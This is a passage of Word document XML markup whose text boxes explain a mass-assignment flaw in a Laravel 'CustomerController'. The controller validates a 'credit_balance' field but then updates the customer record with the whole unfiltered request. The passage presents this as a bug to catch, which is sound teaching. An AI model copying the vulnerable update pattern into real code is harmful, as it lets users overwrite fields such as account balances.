                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="924"/>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130" name="Rectangle 1130"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="614214" y="271983"/>
                            <a:ext cx="2015550" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="64B456A1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>CustomerController.php:148</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1131" name="Rectangle 1131"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2156668" y="257175"/>
                            <a:ext cx="971047" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="756C47C2" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">. The method </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1132" name="Rectangle 1132"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2886819" y="257175"/>
                            <a:ext cx="342283" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5609E58C" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:i/>
                                </w:rPr>
                                <w:t>does</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1133" name="Rectangle 1133"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3144292" y="257175"/>
                            <a:ext cx="3675552" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="54B8004D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> validate first, which is what makes this easy to miss:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1134" name="Rectangle 1134"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="651005"/>
                            <a:ext cx="5287865" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="31F07F03" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>$request-&gt;</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>validate(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>[ ... '</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>credit_balance</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>' =&gt; 'nullable|numeric|min:0</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w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1135" name="Rectangle 1135"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="822455"/>
                            <a:ext cx="4925683" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="72456549" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>$data = $request-&gt;</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">all();   </w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">   // rules checked; payload NOT filtered</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1136" name="Rectangle 1136"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1003430"/>
                            <a:ext cx="1810913" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6B4BA17F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>$customer-&gt;update($data);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1137" name="Rectangle 1137"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1371600"/>
                            <a:ext cx="4745406" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F7F6844" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>Validation checks the keys it lists; it does not filter the payload.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1138" name="Rectangle 1138"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3568005" y="1371600"/>
                            <a:ext cx="3737910" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65CFDE87" w14:textId="6C144564" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">  Any other key present in the request including any</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1139" name="Rectangle 1139"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1543050"/>
                            <a:ext cx="719403" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7298DB79" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">column in </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1140" name="Shape 1140"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="542925" y="1524676"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128693"/>
                                  <a:pt x="578235" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132414"/>
                                  <a:pt x="574130" y="133344"/>
                                  <a:pt x="571500"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141" name="Rectangle 1141"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="567928" y="1548333"/>
                            <a:ext cx="697690" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6D28A984" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>$fillable</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1142" name="Rectangle 1142"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1119485" y="1543050"/>
                            <a:ext cx="2868901" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4BFC10D5" w14:textId="64C94331" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> was mass-assigned untouched. Only </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1143" name="Shape 1143"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3276600" y="1524676"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4645"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126454"/>
                                  <a:pt x="694395" y="128693"/>
                                  <a:pt x="692535" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132414"/>
                                  <a:pt x="688430" y="133344"/>
                                  <a:pt x="685800"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144" name="Rectangle 1144"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3303538" y="1548333"/>
                            <a:ext cx="852732" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="201E9A2A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>validated(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1145" name="Rectangle 1145"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3971776" y="1543050"/>
                            <a:ext cx="464829" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="510D0E7B" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> filters.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="76FE5323" id="Group 26229" o:spid="_x0000_s1139" style="width:510.25pt;height:130.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,16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&#10;92Svjar5gQ38rohh